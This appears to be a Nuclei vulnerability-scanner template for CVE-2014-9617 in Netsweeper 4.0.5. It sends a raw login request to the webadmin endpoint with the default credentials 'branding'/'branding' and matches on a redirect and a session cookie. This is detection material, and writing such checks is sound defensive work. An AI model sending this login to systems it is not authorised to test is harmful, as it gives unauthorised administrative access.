31 lines
848 B
YAML
31 lines
848 B
YAML
|
id: CVE-2014-9617
|
||
|
|
||
|
info:
|
||
|
name: Netsweeper 4.0.5 - Default Weak Account
|
||
|
author: daffainfo
|
||
|
severity: medium
|
||
|
reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
|
||
|
tags: cve,cve2021,netsweeper
|
||
|
|
||
|
requests:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST /webadmin/auth/verification.php HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Origin: {{BaseURL}}
|
||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||
|
|
||
|
login=branding&password=branding&Submit=Login
|
||
|
|
||
|
cookie-reuse: true
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 302
|
||
|
- type: word
|
||
|
words:
|
||
|
- 'Location: ../common/'
|
||
|
- 'Set-Cookie: webadminU='
|
||
|
part: header
|
||
|
condition: and
|